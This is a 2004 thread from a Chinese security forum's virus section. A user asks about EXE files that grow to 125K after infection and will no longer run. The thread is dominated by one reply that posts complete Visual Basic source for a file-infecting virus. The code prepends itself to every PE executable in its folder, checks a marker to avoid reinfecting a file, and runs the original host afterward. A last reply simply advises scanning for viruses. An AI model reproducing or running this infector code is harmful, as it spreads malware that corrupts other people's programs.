|
 | 作者: liyanyouth [liyanyouth]
 论坛用户 |
登录 |
| 本帖由 [TomyChen] 从 << 黑客进阶>> 转移而来EXE被感染后都变成125K都不能运行?请问是什么病毒?? 怎么杀? |
| 地主 发表时间: 04-05-03 14:44 |
 | 回复: drckness [drckness]  论坛用户 |
登录 |
 感染很容易!以下代码不要乱用!Option Explicit Private Victim As String 'holds the victim file name Private HostLen As Long 'hods the victim file lenght Private vbArray() As Byte 'hold the vbVirus code Private hArray() As Byte 'holds the victims code Private lenght As Long Const MySize As Integer = 14336 'vbVirus size Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Private Sub Form_Initialize() Dim i As Long On Error GoTo vbVerror 'If an error show the form 'Error will occur if the user starts and 'ends the infected program to quickly 'other error now Write access... 'Copy the vbVirus code to an array to write out to a new file 'in a infect file we would only want to read in the vbVirus code 'which is why filecopy is not used here Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _ As #1 ReDim vbArray(MySize) Get #1, 1, vbArray Close #1 'now copy the victim,into its array 'and the append the two arrays into a file 'overwriting the existing victim file Victim = Dir(App.Path & "\" & "*.EXE") While Victim <> "" If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then Open App.Path & "\" & Victim For Binary Access Read As #1 ReDim hArray(LOF(1)) Get #1, 1, hArray Close #1 'To stop reinfection I make the DOS error msg say ' db "Program can not run due to Murkry Poisoning.",0dh,0ah,24h 'I then check if the M in Murkry is there in all new files 'Yes this will infect any .exe including DOS files but the 'infected exe will fail under anything but a Win32 enviroment 'displaying the above msg If hArray(&H69) <> &H4D Then i = hArray(&H3C) If hArray(i) = &H50 Then Open App.Path & "\" & Victim For Binary Access Write As #1 Put #1, , vbArray Put #1, MySize, hArray Close #1 End If 'Make sure its a PE file End If 'Simple check to make sure we are not reinfecting End If 'check for Current file name Victim = Dir() 'Get Next victim Wend 'All possible exe's have been infected by the vbVirus 'Now we need to generate the old host and spawn off it Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 lenght = LOF(1) - MySize If lenght <> 0 Then ReDim vbArray(lenght - 1) Get #1, MySize, vbArray Close #1 Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1 Put #1, , vbArray Close #1 'Routine to shell and wait for the host to close 'then delete the file. If while running the host the 'user copied that file he would have the orginal file back 'so this is one way to disinfect idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill App.Path & "\" & App.EXEName & ".eve" Else Close #1 End If End vbVerror: End Sub 'End the Init routines [此贴被 drckness(drckness) 在 05月09日16时04分 编辑过] |
| B1层 发表时间: 04-05-09 16:03 |
 | 回复: zuanmolv [zuanmolv]  论坛用户 |
登录 |
|
是什么病毒并不重要,先杀毒吧! |
| B2层 发表时间: 04-05-11 11:37 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: EXE被感染后都变成125K不能运行!请问是什么病毒??